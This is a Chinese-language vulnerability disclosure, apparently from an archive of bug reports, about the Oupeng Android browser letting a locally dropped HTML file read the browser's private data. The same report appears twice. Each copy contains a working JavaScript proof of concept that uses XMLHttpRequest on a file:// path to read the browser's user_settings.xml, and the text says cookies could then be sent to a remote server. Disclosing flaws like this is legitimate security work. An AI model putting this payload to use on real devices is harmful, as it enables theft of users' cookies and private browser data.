VULHUB ™

### 简要描述： 向欧鹏浏览器发送请求要求打开一个页面时，在非root情况下，可获取欧鹏浏览器下的所有数据，包括cookie信息等，盗取之后可以发送给远程服务器。 ### 详细说明： 可以通过一个app释放一个攻击html到sd卡上，然后该app打开欧鹏浏览器，执行这个文件html文件，路径为file:///mnt/sdcard/hehe.html。向欧鹏浏览器发送请求要求打开一个页面时,即可触发 hehe.html文件如下(如下是举例，还可以上传到服务器) ``` <html> <body> <script type="text/javascript"> function getRet() { var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); if(request.overrideMimeType) { request.overrideMimeType('text/xml'); } } xmlhttp = request; alert("ok"); //获取本地文件代码 xmlhttp.open("GET", "file:////data/data/com.oupeng.browser/shared_prefs/user_settings.xml", false); xmlhttp.send(null); var ret = xmlhttp.responseText; alert(ret); } getRet(); </script> </body> </html> ``` ### 漏洞证明： 能够上传隐私信息，例如cookie信息等等，造成隐私信息泄露

### 简要描述： 向欧鹏浏览器发送请求要求打开一个页面时，在非root情况下，可获取欧鹏浏览器下的所有数据，包括cookie信息等，盗取之后可以发送给远程服务器。 ### 详细说明： 可以通过一个app释放一个攻击html到sd卡上，然后该app打开欧鹏浏览器，执行这个文件html文件，路径为file:///mnt/sdcard/hehe.html。向欧鹏浏览器发送请求要求打开一个页面时,即可触发 hehe.html文件如下(如下是举例，还可以上传到服务器) ``` <html> <body> <script type="text/javascript"> function getRet() { var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); if(request.overrideMimeType) { request.overrideMimeType('text/xml'); } } xmlhttp = request; alert("ok"); //获取本地文件代码 xmlhttp.open("GET", "file:////data/data/com.oupeng.browser/shared_prefs/user_settings.xml", false); xmlhttp.send(null); var ret = xmlhttp.responseText; alert(ret); } getRet(); </script> </body> </html> ``` ### 漏洞证明： 能够上传隐私信息，例如cookie信息等等，造成隐私信息泄露